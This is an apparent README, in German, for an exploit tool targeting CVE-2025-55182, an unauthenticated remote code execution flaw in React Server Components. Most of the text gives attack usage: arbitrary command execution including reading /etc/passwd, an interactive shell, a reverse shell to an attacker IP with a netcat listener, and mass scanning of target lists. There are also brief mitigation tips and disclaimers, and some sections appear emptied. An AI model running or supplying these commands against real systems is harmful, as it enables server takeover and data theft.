
CVE-2025-55182
⚠️ Rechtshinweis: Dieses Tool dient ausschließlich der Sicherheitsforschung, autorisierten Penetrationstests und Bildungszwecken. Die Verwendung dieses Tools gegen Zielsysteme ohne ausdrückliche Genehmigung ist illegal und unethisch.
CVE-2025-55182 ist eine kritische Schwachstelle für Remote Code Execution (RCE) in React Server Components (RSC), die es nicht authentifizierten Angreifern ermöglicht, durch bösartige JavaScript-Deserialisierung beliebigen Code auf dem Server auszuführen.
| Attribut | Wert |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS-Score | 9.8 (Kritisch) |
| Angriffsvektor | Netzwerk |
| Angriffskomplexität | Niedrig |
| Erforderliche Berechtigungen | Keine |
| Benutzerinteraktion | Keine |
| Auswirkung | Hoch (Vertraulichkeit, Integrität, Verfügbarkeit) |
| Betroffene Komponente | React Server Components (RSC) |
| Betroffene Versionen | React 18.x - 19.x (bestimmte Builds) |
| Offenlegungsdatum | 3. Dezember 2025 |
| CVE-Alias | React2Shell |
Grundursache: React Server Components deserialisieren bei der Verarbeitung von RSC-Payloads vom Benutzer bereitgestellte JavaScript-Objekte nicht ordnungsgemäß, sodass Angreifer bösartigen Code injizieren können, der auf dem Server ausgeführt wird.
Angriffsvektor: Bösartige RSC-Payloads in HTTP-Anfragen Auswirkung: Remote Code Execution ohne Authentifizierung, Serverübernahme, Datenleak
# Repository klonen
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# Abhängigkeiten installieren
pip install -r requirements.txt
# Abhängigkeiten installieren
pip install requests
# Befehl auf dem verwundbaren Ziel ausführen
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# Interaktiver Shell-Modus
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# Benutzerdefinierter Befehl
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# Reverse Shell mit benutzerdefinierter IP/Port erstellen
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# Massen-Scan
python exploit/batch_scanner.py -f targets.txt
# Ausführlicher Modus
python exploit/cve_2025_55182.py -u http://target.com -v
# Benutzerdefinierter User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
Greifen Sie auf die verwundbare Anwendung zu: http://localhost:3000
Führen Sie einen einzelnen Befehl auf dem verwundbaren Server aus:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
Erwartete Ausgabe:
[+] Schwachstellenerkennung erfolgreich: React Server Components RCE
[+] Befehl ausgeführt: id
[+] Antwort:
uid=0(root) gid=0(root) groups=0(root)
Erhalten Sie eine interaktive Shell auf dem verwundbaren Server:
python exploit/cve_2025_55182.py -u http://target.com --shell
Funktionen:
Stellen Sie eine Reverse-Shell-Verbindung her:
# Auf der Maschine des Angreifers
nc -lvnp 4444
# Exploit ausführen
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
Scannen Sie mehrere Ziele auf Schwachstellen:
# Zieldatei erstellen
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# Massen-Scanner ausführen
python exploit/batch_scanner.py -f targets.txt
React aktualisieren
npm install react@latest
# Auf die behobene Version aktualisieren
RSC-Anfragen blockieren
// RSC vorübergehend deaktivieren
const config = {
enableRSC: false
}
WAF-Regeln
# Verwundbare Umgebung aufsetzen
cd target && docker-compose up -d
# Schwachstelle testen
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# Testsuite ausführen
python tests/test_exploit.py
Dieses Tool demonstriert:
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE.
Wichtig: Dieses Tool ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bestimmt.
Durch die Nutzung dieses Tools stimmen Sie zu:
Wenn Sie diese Schwachstelle in Produktionssystemen entdecken:
An den Anbieter melden
CVE-Zuweisung
Sicherheits-Community
Denken Sie daran: Sicherheitsforschung sollte stets ethisch und legal sein. Nutzen Sie Ihre Fähigkeiten, um das Internet sicherer zu machen! 🛡️